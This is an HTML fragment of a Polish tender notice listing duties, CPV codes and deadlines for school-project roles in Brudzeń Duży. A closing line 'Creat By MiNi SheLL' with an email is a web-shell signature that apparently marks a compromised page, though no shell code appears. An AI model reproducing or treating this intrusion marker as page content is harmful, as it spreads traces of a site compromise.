<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Obowiązki : rekrutacja uczestników prowadzona w szkole zgodnie z zapisami projektu w tym nadzorowanie podpisywania deklaracji uczestnictwa i innych dokumentów związanych z rekrutacją;opracowanie i przekazanie Koordynatorowi projektu szczegółowego planu zajęć finansowanych z PO KL dostosowanego do istniejącego planu zajęć w szkole oraz uwzględniającego inne warunki funkcjonowania placówki; przygotowanie wstępnej specyfikacji (poprzez szczegółowe określenie cech) sprzętu i materiałów dydaktycznych przewidzianych do zakupu w ramach projektu. Przekazanie ww. specyfikacji Specjaliście ds. zamówień publicznych w terminie umożliwiającym przygotowanie Specyfikacji Istotnych Warunków Zamówienia (SIWZ) zgodnie z harmonogramem projektu;rozdysponowanie sprzętu i materiałów dydaktycznych do realizacji zajęć zakupionych w ramach projektu;opracowanie i przekazanie Koordynatorowi projektu szczegółowych programów zajęć realizowanych w ramach projektu;oznaczenie logotypami sprzętu i innych materiałów zakupionych w ramach projektu; przekazywanie Koordynatorowi projektu materiałów, dokumentów i informacji niezbędnych do księgowania, ewaluacji i rozliczania projektu;stały kontakt z Koordynatorem projektu i pozostałą kadrą projektu w celu omawiania bieżących spraw i reagowania na potencjalne nieprawidłowości;nadzór merytoryczny nad realizacją zajęć prowadzonych w ramach projektu na terenie danej placówki;współpraca z dyrektorem placówki na terenie, której realizowane będą zajęcia w ramach projektu;udział w warsztatach organizowanych dla kadry projektu;udział w spotkaniach kadry projektu organizowanych przez Koordynatora projektu;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Koordynator szkolny w Gimnazjum w Brudzeniu Dużym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Obowiązki : rekrutacja uczestników prowadzona w szkole zgodnie z zapisami projektu w tym nadzorowanie podpisywania deklaracji uczestnictwa i innych dokumentów związanych z rekrutacją;opracowanie i przekazanie Koordynatorowi projektu szczegółowego planu zajęć finansowanych z PO KL dostosowanego do istniejącego planu zajęć w szkole oraz uwzględniającego inne warunki funkcjonowania placówki; przygotowanie wstępnej specyfikacji (poprzez szczegółowe określenie cech) sprzętu i materiałów dydaktycznych przewidzianych do zakupu w ramach projektu. Przekazanie ww. specyfikacji Specjaliście ds. zamówień publicznych w terminie umożliwiającym przygotowanie Specyfikacji Istotnych Warunków Zamówienia (SIWZ) zgodnie z harmonogramem projektu;rozdysponowanie sprzętu i materiałów dydaktycznych do realizacji zajęć zakupionych w ramach projektu;opracowanie i przekazanie Koordynatorowi projektu szczegółowych programów zajęć realizowanych w ramach projektu;oznaczenie logotypami sprzętu i innych materiałów zakupionych w ramach projektu; przekazywanie Koordynatorowi projektu materiałów, dokumentów i informacji niezbędnych do księgowania, ewaluacji i rozliczania projektu;stały kontakt z Koordynatorem projektu i pozostałą kadrą projektu w celu omawiania bieżących spraw i reagowania na potencjalne nieprawidłowości;nadzór merytoryczny nad realizacją zajęć prowadzonych w ramach projektu na terenie danej placówki;współpraca z dyrektorem placówki na terenie, której realizowane będą zajęcia w ramach projektu;udział w warsztatach organizowanych dla kadry projektu;udział w spotkaniach kadry projektu organizowanych przez Koordynatora projektu;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Koordynator szkolny w Szkole Podstawowej w Brudzeniu Dużym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Obowiązki : rekrutacja uczestników prowadzona w szkole zgodnie z zapisami projektu w tym nadzorowanie podpisywania deklaracji uczestnictwa i innych dokumentów związanych z rekrutacją;opracowanie i przekazanie Koordynatorowi projektu szczegółowego planu zajęć finansowanych z PO KL dostosowanego do istniejącego planu zajęć w szkole oraz uwzględniającego inne warunki funkcjonowania placówki; przygotowanie wstępnej specyfikacji (poprzez szczegółowe określenie cech) sprzętu i materiałów dydaktycznych przewidzianych do zakupu w ramach projektu. Przekazanie ww. specyfikacji Specjaliście ds. zamówień publicznych w terminie umożliwiającym przygotowanie Specyfikacji Istotnych Warunków Zamówienia (SIWZ) zgodnie z harmonogramem projektu;rozdysponowanie sprzętu i materiałów dydaktycznych do realizacji zajęć zakupionych w ramach projektu;opracowanie i przekazanie Koordynatorowi projektu szczegółowych programów zajęć realizowanych w ramach projektu;oznaczenie logotypami sprzętu i innych materiałów zakupionych w ramach projektu; przekazywanie Koordynatorowi projektu materiałów, dokumentów i informacji niezbędnych do księgowania, ewaluacji i rozliczania projektu;stały kontakt z Koordynatorem projektu i pozostałą kadrą projektu w celu omawiania bieżących spraw i reagowania na potencjalne nieprawidłowości;nadzór merytoryczny nad realizacją zajęć prowadzonych w ramach projektu na terenie danej placówki;współpraca z dyrektorem placówki na terenie, której realizowane będą zajęcia w ramach projektu;udział w warsztatach organizowanych dla kadry projektu;udział w spotkaniach kadry projektu organizowanych przez Koordynatora projektu;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.40.10.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Specjalista ds. ewaluacji i monitoringu projektu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Obowiązki specjalisty ds. ewaluacji i monitoringu projektu: przygotowanie narzędzi ewaluacyjnych;usprawnienie procedur i propozycje działania zwiększających efektywność pracy w celu osiągnięcia rezultatów projektu; przeprowadzanie standardowych badań, poprzez ankiety, pogłębione wywiady i raporty w celu oceny postępów rozwoju dziecka raz na semestr;opracowanie raportu końcowego dotyczącego realizacji całego projektu;prowadzenie ewaluacji z uwzględnieniem perspektywy płci w diagnozach; współpraca z koordynatorem projektu, koordynatorami szkolnymi, księgową/ym projektu  oraz specjalistą ds. kadr; przeprowadzenie przynajmniej raz w tygodniu monitoringu organizacyjnego, poprzez kontrolę prowadzonych zajęć na miejscu w szkołach; pomiar i kontrola osiąganych wskaźników i ich wpływ na cele projektu (m.in. kontrola frekwencji, wyniki testów i ankiet wstępnych/końcowych, kompletowanie i archiwizacja danych o postępach Beneficjentów Ostatecznych);kontrola współpracy nauczycieli i specjalistów z rodzicami; stały kontakt z Koordynatorem projektu i osobami decyzyjnymi szkół w celu omawiania bieżących spraw i reagowania na potencjalne nieprawidłowości; udział w warsztatach organizowanych dla kadry projektu;udział w spotkaniach kadry projektu organizowanych przez Koordynatora projektu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Księgowa/y projektu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Obowiązki księgowej/go projektu:kontrola kompletności dokumentacji;przygotowywanie zestawień do raportów i analiz;dokonywanie bieżących płatności;nadzór nad prawidłowością operacji finansowych;rozliczanie zgodnie z budżetem projektu;weryfikacja i akceptowanie pod względem formalnym i rachunkowym dokumentów, które powstały w projekcie, z uwzględnieniem zasad kwalifikowalności wydatków;opisywanie faktur zgodnie z wymogami wynikającymi z przepisów dotyczących wdrażania programów współfinansowanych z EFS POKL;współpraca z osobami zaangażowanymi w realizację projektu (koordynatorem projektu, koordynatorami szkolnymi, specjalistą ds. monitoringu i ewaluacji projektu oraz specjalistą ds. kadr);bieżące czuwanie nad właściwym przygotowaniem dokumentów potwierdzających wydatki, akceptacje i podpisy stosownych osób zgodnie z zasadami rachunkowości budżetowej, księgowanie kompletnych dokumentów;bieżący monitoring przepływów pieniężnych-czuwanie nad terminowym regulowaniem płatności;sporządzanie kompletu dokumentów rozliczeniowych zgodnie z ustalonym harmonogramem płatności: wniosków o płatność w aplikacji Generatora Wniosków Płatniczych POKL w części finansowej, załącznika nr 1 do wniosku o płatność; składowych wynagrodzeń, wyciągów bankowych potwierdzających zrealizowane wydatki;przygotowywanie sprawozdań do Instytucji Pośredniczącej w wymaganych i obowiązujących terminach z zakresie finansowym;sporządzanie planów wydatków projektu z uwzględnieniem obowiązującej klasyfikacji budżetowej, przygotowywanie propozycji zmian do planów w ciągu roku budżetowego;sporządzanie sprawozdań z realizacji wydatków projektu według obowiązujących przepisów dotyczących sprawozdawczości budżetowej;udzielanie bieżących informacji personelowi zarządzającemu na temat stanu realizacji poszczególnych zadań projektu w ujęciu finansowym;bieżący kontakt w sprawach finansowych z Instytucją Pośredniczącą i innymi instytucjami zaangażowanymi bezpośrednio w realizację projektu;zapewnienie pomocy zleceniodawcy w trakcie przeprowadzenia kontroli zewnętrznej i wewnętrznej w okresie trwania projektu, jak również po jego realizacji;udział w spotkaniach kadry projektu organizowanych przez Koordynatora projektu; realizacja innych nie wymienionych powyżej zadań niezbędnych do prawidłowego zarządzania projektem. Pełnienie funkcji księgowe/go projektu odbywać się będzie pod kierownictwem Zamawiającego oraz w miejscu i czasie przez niego wyznaczonym;w celu właściwego wykonania przedmiotu zamówienia wykonawca będzie obecny w biurze projektu = siedzibie Zamawiającego co najmniej 2 godziny dziennie w godzinach pracy Urzędu Gminy w Brudzeniu Dużym oraz na każde telefoniczne wezwanie Zamawiającego w ciągu 3 godzin od chwili powiadomienia;faktycznie przepracowany czas przez Księgową/ego  projektu w siedzibie Zamawiającego będzie kontrolowany za pomocną listy obecności, która będzie podstawą do zatwierdzenia wynagrodzenia w każdym przepracowanym miesiącu realizacji projektu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1, 79.21.10.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Specjalista ds. kadr.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Obowiązki specjalisty ds. kadr: prowadzenie spraw kadrowo płacowych pracowników w systemie SAGE Symfonia i Płatnik; sporządzanie umów o pracę, zleceń i o dzieło;sporządzanie list płatniczych, zasiłków chorobowych i opiekuńczych pracowników;naliczanie składek na ubezpieczenie społeczne opłacanych przez pracowników  i zakład pracy od wynagrodzeń pracowników i zleceniobiorców;sporządzanie dokumentów zgłoszeniowych i rozliczeniowych ZUS;naliczanie podatku dochodowego od osób fizycznych od wynagrodzeń; sporządzanie dokumentów rozliczeniowych dotyczących podatku dochodowego od osób  fizycznych; prowadzenie kart wynagrodzeń pracowników;przygotowywanie przelewów i wypłaty wynagrodzeń pracowników zatrudnionych w  ramach projektu oraz zleceniobiorców;sporządzanie i wystawianie innych dokumentów i zaświadczeń związanych z zatrudnieniem i wypłacaniem wynagrodzeń/ świadczeń;ścisła współpraca z Koordynatorem projektu i księgową/ym projektu pod względem finansowym;udział w spotkaniach kadry projektu organizowanych przez Koordynatora projektu;realizacja innych nie wymienionych powyżej zadań niezbędnych do prawidłowego zarządzania projektem. Pełnienie funkcji specjalisty ds. kadr odbywać się będzie pod kierownictwem Zamawiającego oraz w miejscu i czasie przez niego wyznaczonym;w celu właściwego wykonania przedmiotu zamówienia wykonawca będzie obecny w biurze projektu tj. siedzibie Zamawiającego co najmniej 2 godziny dziennie w godzinach pracy Urzędu Gminy w Brudzeniu Dużym oraz na każde telefoniczne wezwanie Zamawiającego w ciągu 3 godzin od chwili powiadomienia;faktycznie przepracowany czas przez Specjalistę ds. kadr w siedzibie Zamawiającego będzie kontrolowany za pomocną listy obecności, która będzie podstawą do zatwierdzenia wynagrodzenia w każdym przepracowanym miesiącu realizacji projektu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1, 79.21.10.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com